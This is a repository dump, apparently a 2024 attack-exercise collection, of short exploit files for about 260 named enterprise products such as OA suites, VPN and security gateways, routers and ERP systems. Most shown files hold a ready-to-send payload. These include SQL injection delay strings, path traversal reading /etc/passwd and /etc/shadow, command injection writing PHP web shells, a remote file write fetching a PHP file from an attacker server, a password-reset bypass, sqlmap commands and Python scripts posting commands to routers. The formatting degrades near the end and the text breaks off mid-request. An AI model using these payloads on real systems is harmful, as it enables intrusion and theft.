```
├── Untitled.md
├── 迈普-多业务融合网关-信息泄露.md
├── 甄云 SRM 云平台 SpEL 表达式注入漏洞.md
├── 360天擎 - 未授权访问.md
├── 锐捷EG350易网关管理系统存在信息泄露漏洞.md
├── 飞企互联loginService任意登录.md
├── Sharp 多功能打印机未授权访问漏洞.md
├── 360 新天擎终端安全管理系统存在信息泄露漏洞.md
├── 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md
├── 网康 NS-ASG 信息泄露漏洞.md
├── .gitattributes
├── 九思-OA-任意文件上传.md
├── 海康威视教育综合安防管理系统admintoken泄露.md
├── 锐捷RG-NBS2026G-P交换机WEB管理 ping.htm 未授权访问漏洞.md
├── Apache ActiveMQ远程命令执行漏洞.md
├── LiveNVR流媒体服务软件存在未授权访问漏洞.md
├── 福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞.md
├── 紫光-电子档案管理系统-PermissionAC.md
├── 360天擎 - sql注入.md
├── 拓尔思-TRSWAS5.0-PermissionAC文件上传.md
├── 超级猫签名APP分发平台前台远程文件写入漏洞.md
├── 金和OA_SAP_B1Config.aspx未授权访问漏洞.md
├── H3C网络管理系统任意文件读取漏洞.md
├── 联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞.md
├── 飞讯云WMS MyDownMylmportData 前台SQL注入.md
├── Bazarr swaggerui任意文件读取漏洞.md
├── 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md
├── 广州图创-图书馆集群管理系统-PermissionAC.md
├── 锐捷M18000-WS-ED无线控制器存在CRL命令注入.md
├── 万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞.md
├── KubePi存在JWT验证绕过漏洞.assets
│   └── image-20240806095638556.png
├── Bazarr swaggerui组件目录穿越导致任意文件读取漏洞.md
├── D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113).md
├── F5 BIG-IP 远程代码执行漏洞.md
├── 锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞.md
├── 电信网关 ipping.php 命令执行漏洞.assets
│   └── image-20240729092933849.png
├── 万户OA SQL注入漏洞.md
├── 小学智慧校园信息管理系统 Upload 文件上传漏洞.assets
│   └── image-20240729093018380.png
├── 易宝OA 存在BasicService存在任意文件上传漏洞.assets
│   └── image-20240729092805340.png
├── Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md
├── H3C-SecParh堡垒机任意用户登录漏洞.md
├── JeePlus快速开发平台resetpassword存在SQL注入漏洞.md
├── 安恒明御安全网关远程命令执行漏洞.md
├── 启明星辰 天玥网络安全审计系统 SQL 注入漏洞.md
├── 满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞.md
├── H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180).md
├── 用友-畅捷通CRM-任意文件上传.md
├── 金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞.md
├── 帆软报表 channel 远程命令执行漏洞.md
├── WVP视频平台(国标28181)未授权SQL注入漏洞.md
├── JeecgBoot反射型XSS漏洞.md
├── 建文工程管理系统 download2 文件读取漏洞.md
├── Coremail邮件系统未授权访问获取管理员账密.md
├── Tenda 03 代码执行漏洞(CVE-2024-6963).md
├── 泛微ecology系统setup接口存在信息泄露漏洞.md
├── Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md
├── 网神SecSSL3600安全接入网关系统任意密码修改漏洞.md
├── 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md
├── 金和OA jc6 clobfield SQL注入漏洞.md
├── 用友时空KSOA PreviewKPQT SQL注入漏洞.md
├── 科荣AIO moffice SQL注入漏洞.md
├── Netgear-WN604接口downloadFile.php信息泄露漏洞.md
├── 天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞.md
├── 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md
├── 安恒-下一代防火墙-RCE.md
├── 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md
├── 金和OA任意文件读取漏洞.md
├── 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md
├── panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md
├── 喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md
├── 致远AnalyticsCloud 分析云存在任意文件读取漏洞.md
├── Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md
├── 宏脉医疗DownLoadServerFile任意文件读取下载漏洞.md
├── 华天动力-OA-downloadWpsFile任意文件读取.md
├── 证书查询系统存在任意文件读取漏洞.md
├── 通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞.md
├── 福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞.md
├── 1Panel 远程代码执行漏洞(XVE-2024-17699).md
├── RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md
├── fogproject系统接口export.php存在远程命令执行漏洞.md
├── 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md
├── 金万维云联应用系统接入平台RCE.md
├── 福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞.md
├── 科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞.md
├── 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md
├── 金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md
├── 用友 U8 cloud MonitorServlet 反序列化漏洞.md
├── 科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞.md
├── 天玥网络安全审计系统 SQL 注入漏洞.md
├── 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md
├── 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md
├── 竹云 信息泄露.md
├── 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md
├── 数字通云平台智慧政务 time SQL注入漏洞.md
├── SuiteCRM responseEntryPoint存在SQL注入漏洞.md
├── 泛微E-Mobile installOperate.do SSRF漏洞.md
├── 1Panel面板最新前台RCE漏洞.md
├── 方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞.md
├── 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md
├── 通达OA V11.10 login.php SQL注入漏洞.md
├── 西软云XMS-futurehoteloperate接口存在XXE漏洞.md
├── 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md
├── 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md
├── ServiceNowUI Macros CVE-2024-4879 模板注入漏洞.md
├── 用友-U8-Cloud-文件上传.md
├── 魔方网表 mailupdate.jsp 接口 任意文件上传.md
├── 华磊科技物流modifyInsurance sql注入漏洞.md
├── 用友U8 Cloud ActionServlet SQL注入漏洞.md
├── 汇智ERP filehandle.aspx 任意文件读取漏洞.md
├── Quicklancer存在SQL注入漏洞.md
├── 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md
├── 广联达-Linkworks-GetAllData接口存在未授权访问.md
├── 用友NC Cloud queryStaffByName SQL注入漏洞.md
├── 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md
├── JeecgBoot积木报表存在SQL注入.md
├── 泛微e-cology9 存在SSRF漏洞.md
├── 赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞.md
├── 华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md
├── 致远constDef接囗存在代码执行漏洞.md
├── aiohttp存在目录遍历漏洞(CVE-2024-23334).md
├── 超级猫签名APP分发平台前台存在SQL注入漏洞.md
├── 用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞.md
├── eking管理易FileUpload接口存在任意文件上传漏洞.md
├── 全息AI网络运维平台存在命令执行漏洞.md
├── 深信服-下一代防火墙-RCE.md
├── 致远互联FE协作办公平台apprvaddNew存在SQL注入.md
├── 微信公众平台-无限回调系统-SQL注入.md
├── 用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞.md
├── 金和OA_HomeService.asmxSQL注入.md
├── 瑞斯康达多业务智能网关RCE.md
├── 用友 UAP querygoodsgridbycode SQL 注入.md
├── Array VPN任意文件读取漏洞.md
├── 蓝凌 EKP 远程代码执行漏洞.md
├── 蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入.md
├── 蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入.md
├── 瑞斯康达-多业务智能网关-RCE.md
├── 万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞.md
├── 深信服下一代防火墙NGAF存在任意文件上传漏洞.md
├── 蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入.md
├── 蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入.md
├── 蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入.md
├── 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md
├── 蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入.md
├── 科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞.md
├── 金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md
├── 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md
├── 拓尔思TRS媒资管理系统任意文件上传.md
├── 29网课交单平台epay.php存在SQL注入漏洞.md
├── 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md
├── 金和OA_jc6_Upload任意文件上传.md
├── 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md
├── 金和OA_MailTemplates.aspx_SQL注入漏洞.md
├── 建文工程管理系统desktop.ashx存在SQL注入漏洞.md
├── 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md
├── 科荣AIO系统UtilServlet存在任意命令执行漏洞.md
├── 绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md
├── 飞讯云MyImportData前台SQL注入.md
├── 百易云资产管理运营系统任意文件上传.md
├── 锐捷-EG易网关存在RCE漏洞.md
├── 小学智慧校园信息管理系统 Upload 文件上传漏洞.md
├── H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md
├── 方天云智慧平台系统文件上传.md
├── 润乾报表InputServlet存在任意文件上传漏洞.md
├── 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md
├── 指尖云平台-智慧政务payslip SQL注入漏洞.md
├── 数字通指尖云平台-智慧政务payslip SQL注入漏洞.md
├── 资管云--任意文件上传.md
├── Panalog 日志审计系统 SQL 注入漏洞.md
├── 云课网校系统uploadImage存在任意文件上传漏洞.md
├── 安恒明御安全网关rce.md
├── 湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞.md
├── 金慧综合管理信息系统SQL注入漏洞.md
├── 用友U9-UMWebService.asmx存在文件读取漏洞.md
├── 金和OA_upload_json.asp存在任意文件上传漏洞.md
├── 创客13星零售商城系统RCE.md
├── 泛微OA E-Office V10 OfficeServer 任意文件上传.md
├── AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md
├── SpringBlade系统menu接口存在SQL注入漏洞.md
├── Confluence远程命令执行漏洞(CVE-2024-21683).md
├── 泛微OA E-Cology存在SQL注入漏洞.md
├── 泛微E-office-10接口leave_record.php SQL注入漏洞.md
├── 海康威视综合安防管理平台前台RCE.md
├── T18-1TOTOLINK-A6000R-RCE.md
├── 网康 NS-ASG sql 注入漏洞.md
├── AJ-Report开源数据大屏存在远程命令执行漏洞.md
├── 云时空商业ERP文件上传.md
├── 金和OA_jc6_ntko-upload任意文件上传漏洞.md
├── 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md
├── 用友 NC Cloud jsinvoke 任意文件上传.md
├── 用友U8 CRM import.php 文件上传漏洞.md
├── H3C密码泄露漏洞.md
├── 海康卫视综合安防 uploadAllPackage任意文件上传.md
├── 万户ezoffice wpsservlet任意文件上传.md
├── 用友u8-cloud RegisterServlet SQL注入.md
├── 锐捷统一上网行为管理与审计系统 static_convert.php 命令执行.md
├── 用友-CRM客户关系管理系统-任意文件上传.md
├── 用友U8 Cloud linkntb存在SQL注入漏洞.md
├── 同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞.md
├── IP网络广播服务平台存在任意文件上传漏洞.md
├── 亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞.md
├── 海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md
├── DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md
├── 泛微HrmService存在SQL注入漏洞.md
├── 因酷教育平台RCE(CVE-2024-35570).md
├── 蓝凌EKP存在sys_ui_component远程命令执行漏洞 .md
├── 电信网关 ipping.php 命令执行漏洞.md
├── 宏景eHR sdutygetSdutyTree SQL注入.md
├── H3C-CVM-upload接口前台任意文件上传漏洞.md
├── 启明星辰-天清汉马VPN接口download任意文件读取.md
├── 帆软未授权命令执行.md
├── 泛微 e-cology9 servicesWorkPlanService 前台SQL注入.md
├── 建文工程项目管理软件BusinessManger存在SQL注入漏洞.md
├── 易宝OA ExecuteSqlForSingle SQL注入漏洞.md
├── 创客13星零售商城系统前台任意文件上传漏洞.md
├── 易宝OA 存在BasicService存在任意文件上传漏洞.md
├── 好视通视频会议系统存在任意文件读取漏洞.md
├── 用友NC任意文件读取.md
├── 深澜计费管理系统strategy存在反序列化漏洞.md
├── 任我行协同CRM反序列化漏洞.md
├── 明源云ERP接口ApiUpdate.ashx文件上传漏洞.md
├── F-logic DataCube3存在命令执行漏洞.md
├── Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793.md
├── 泛微云桥文件上传.md
├── APP分发签名系统index-uplog.php存在任意文件上传漏洞.md
├── 海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md
├── Docassemble任意文件读取漏洞(CVE-2024-27292).md
├── 捷诚管理信息系统 SQL注入漏洞.md
├── 山石网科云鉴存在前台任意命令执行漏洞.md
├── 科荣 AIO 管理系统任意文件读取.md
├── 用友U9系统DoQuery接口存在SQL注入.md
├── H3C Magic B1STV100R012 RCE.md
├── 致远 OA fileUpload.do 前台文件上传绕过漏洞.md
├── Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md
├── 铭飞MCMS 远程代码执行漏洞.md
├── H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md
├── 红海云eHR kqFile.mob 任意文件上传.md
├── 禅道研发项⽬管理系统未授权.md
├── 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md
├── 猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞.md
├── DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md
├── 金和OA_CarCardInfo.aspx_SQL注入漏洞.md
├── KubePi存在JWT验证绕过漏洞.md
├── 广联达OA接口ArchiveWebService存在XML实体注入漏洞.md
├── 广联达Linkworks ArchiveWebService XML实体注入漏洞.md
├── Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md
├── 润乾报表dataSphereServlet接口 任意文件读取漏洞.md
├── 用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞.md
├── 泛微E-cology9 browserjsp SQL注入漏洞.md
├── 福建科立讯通信指挥调度管理平台任意文件上传.md
├── 润乾报表dataSphereServlet 任意文件上传漏洞.md
└── 帆软FineReport报表 ReportServer SQL注入getshell.md
```

/Untitled.md:
--------------------------------------------------------------------------------

/迈普-多业务融合网关-信息泄露.md:
--------------------------------------------------------------------------------
```
/.htpasswd/
```

/甄云 SRM 云平台 SpEL 表达式注入漏洞.md:
--------------------------------------------------------------------------------
/oauth/public/SpEL表达式/ab?username=bHM=

/360天擎 - 未授权访问.md:
--------------------------------------------------------------------------------
```
/api/dp/rptsvcsyncpoint?ccid=1
```

/锐捷EG350易网关管理系统存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
```
/tool/shell/nginx.conf
```

/飞企互联loginService任意登录.md:
--------------------------------------------------------------------------------
```
/loginService.fe?op=D
```

/Sharp 多功能打印机未授权访问漏洞.md:
--------------------------------------------------------------------------------
```
/installed_emanual_list.html
```

/360 新天擎终端安全管理系统存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
```
/runtime/admin_log_confcache
```

/杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md:
--------------------------------------------------------------------------------
```
重置密码处,改回包中的code字段为1
```

/网康 NS-ASG 信息泄露漏洞.md:
--------------------------------------------------------------------------------
```
/configsave/manufacture-default.tar.gz
```

/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto

/九思-OA-任意文件上传.md:
--------------------------------------------------------------------------------
```
/jsoa/wpsforlinux/src/upload_l.jsp?openType=
```

/海康威视教育综合安防管理系统admintoken泄露.md:
--------------------------------------------------------------------------------
```
/portal/conf/config.properties
```

/锐捷RG-NBS2026G-P交换机WEB管理 ping.htm 未授权访问漏洞.md:
--------------------------------------------------------------------------------
```
/safety/ping.htm
```

/Apache ActiveMQ远程命令执行漏洞.md:
--------------------------------------------------------------------------------
```
https://github.com/Hutt0n0/ActiveMqRCE
```

/LiveNVR流媒体服务软件存在未授权访问漏洞.md:
--------------------------------------------------------------------------------
```
/api/v1/device/channeltree?serial=&pcode
```

/福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞.md:
--------------------------------------------------------------------------------
```
/app/ext/ajax_users.php
```

/紫光-电子档案管理系统-PermissionAC.md:
--------------------------------------------------------------------------------
```
/Archive/ErecordOffice/openOfficeFile
```

/360天擎 - sql注入.md:
--------------------------------------------------------------------------------
```
/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
```

/拓尔思-TRSWAS5.0-PermissionAC文件上传.md:
--------------------------------------------------------------------------------
```
/mas/servlets/uploadThumb?appKey=sv&uploading=1
```

/超级猫签名APP分发平台前台远程文件写入漏洞.md:
--------------------------------------------------------------------------------
```
/user/profile/download?url=http://云服务器地址/111.php&path=1
```

/金和OA_SAP_B1Config.aspx未授权访问漏洞.md:
--------------------------------------------------------------------------------
```
/C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1
```

/H3C网络管理系统任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1
```

/联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞.md:
--------------------------------------------------------------------------------
```
UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)--
```

/飞讯云WMS MyDownMylmportData 前台SQL注入.md:
--------------------------------------------------------------------------------
```
/MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN
```

/Bazarr swaggerui任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
```

/天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
```

/广州图创-图书馆集群管理系统-PermissionAC.md:
--------------------------------------------------------------------------------
```
/interlibSSO/api/BrowseLogInterface?cmdACT=doDataFlowLogStatistic4ERM&sysid=1
```

/锐捷M18000-WS-ED无线控制器存在CRL命令注入.md:
--------------------------------------------------------------------------------
```
POST /web_config.do HTTP/1.1

command=show+running-config&mode_url=exec
```

/万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1
```

/KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png

/Bazarr swaggerui组件目录穿越导致任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
```

/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113).md:
--------------------------------------------------------------------------------
```
/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
```

/F5 BIG-IP 远程代码执行漏洞.md:
--------------------------------------------------------------------------------
```
https://github.com/adysec/nuclei_poc/blob/ce5a47e163f5440c84dbfc0adb073ab35f562154/poc/cve/CVE-2023-46747.yaml
```

/锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
```
/view/vpn/autovpn/online_check.php?peernode= | `echo PD9waHAgcGhwaW5mbygpOw== | base64 -d > 1.php`
```

/电信网关 ipping.php 命令执行漏洞.assets/image-20240729092933849.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/电信网关 ipping.php 命令执行漏洞.assets/image-20240729092933849.png

/万户OA SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
python sqlmap.py -u "http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1" --level 3 --dbs
```

/小学智慧校园信息管理系统 Upload 文件上传漏洞.assets/image-20240729093018380.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/小学智慧校园信息管理系统 Upload 文件上传漏洞.assets/image-20240729093018380.png

/易宝OA 存在BasicService存在任意文件上传漏洞.assets/image-20240729092805340.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/易宝OA 存在BasicService存在任意文件上传漏洞.assets/image-20240729092805340.png

/Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md:
--------------------------------------------------------------------------------
```
POST /clients/MyCRL HTTP/1.1
Host: ip
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow
```

/H3C-SecParh堡垒机任意用户登录漏洞.md:
--------------------------------------------------------------------------------
```
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
```

/JeePlus快速开发平台resetpassword存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
/kjds2022/a/sys/user/resetPassword?mobile=18888888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23
```

/安恒明御安全网关远程命令执行漏洞.md:
--------------------------------------------------------------------------------
```
GET /webui/?g=aaa_portal_auth_config_reset&type=echo '' >> /usr/local/webui/txzfsrur.php
```

/启明星辰 天玥网络安全审计系统 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
```
python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl
```

/满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
```
GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/jars/mkb-job-admin/application-prod-job-private.yml HTTP/1.1
Host:
```

/H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180).md:
--------------------------------------------------------------------------------
```
/webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=.php&bkg_flag=0&check_btn_color=&des=undefined
```

/用友-畅捷通CRM-任意文件上传.md:
--------------------------------------------------------------------------------
```
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
```

/金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
```

/帆软报表 channel 远程命令执行漏洞.md:
--------------------------------------------------------------------------------
```
POST /webroot/decision/remote/design/channel HTTP/1.1
Content-Type: application/json
Host:
cmd: id
Connection: close

{{gzip(file(fine10.bin))}}
```

/WVP视频平台(国标28181)未授权SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
```

/JeecgBoot反射型XSS漏洞.md:
--------------------------------------------------------------------------------
```
GET /userController.do?%3CsCrIpT%3Ealert(document.domain)%3C/sCrIpT%3E HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel MacOS X 10.15; rv:126.0) Gecko/20100101Firefox/126.0
```

/建文工程管理系统 download2 文件读取漏洞.md:
--------------------------------------------------------------------------------
```
POST /Common/DownLoad2.aspx HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
Content-Length: 28

path=../log4net.config&Name=
```

/Coremail邮件系统未授权访问获取管理员账密.md:
--------------------------------------------------------------------------------
```
/coremail/common/assets/;/;/;/;/;/;/s?__biz=MzI3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2
```

/Tenda 03 代码执行漏洞(CVE-2024-6963).md:
--------------------------------------------------------------------------------
```
import requests
ip ="192.168.84.101"
url="http://"+ ip +"/goform/execommand"
payload = b"a"*2000

data = f"cmdinput": payload}
response = requests.post(url, data=data)
```

/泛微ecology系统setup接口存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
```
GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
```

/Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md:
--------------------------------------------------------------------------------
```
import requests

ip = '192.168.74.145'

url = f"http://{ip}/goform/exeCommand"


data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)
```

/网神SecSSL3600安全接入网关系统任意密码修改漏洞.md:
--------------------------------------------------------------------------------
```
POST /changepass.php?type=2 HTTP/1.1
host:
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}

old_pass=&password=Test123!@&repassword=Test123!@
```

/用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
```
GET /kp/PrintZPFB.jsp?zpfbbh=1%27+union+select+1,2,3,4,db_name()+--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
```

/金和OA jc6 clobfield SQL注入漏洞.md:
-------------------------------------------------------------------------------- 1 | ``` 2 | POST /jc6/servlet/clobfield HTTP/1.1 3 | host:127.0.0.1 4 | 5 | key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11%27%2F**%2Fand%2F**%2FCONVERT%28int%2C%40%40version%29%3D1%2F**%2Fand%2F**%2F%27%27%3D%27 6 | ``` 7 | 8 | -------------------------------------------------------------------------------- /用友时空KSOA PreviewKPQT SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 3 | Host: x.x.x.x 4 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 5 | Connection: close 6 | ``` 7 | 8 | -------------------------------------------------------------------------------- /科荣AIO moffice SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 3 | GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:15'--&sid=1 HTTP/1.1 4 | Host: xxx 5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 6 | Connection: close 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /Netgear-WN604接口downloadFile.php信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET /downloadFile.php?file=config HTTP/1.1 3 | Host: 4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 5 | Accept-Encoding: gzip, deflate 6 | Connection: close 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | ``` 2 | GET 
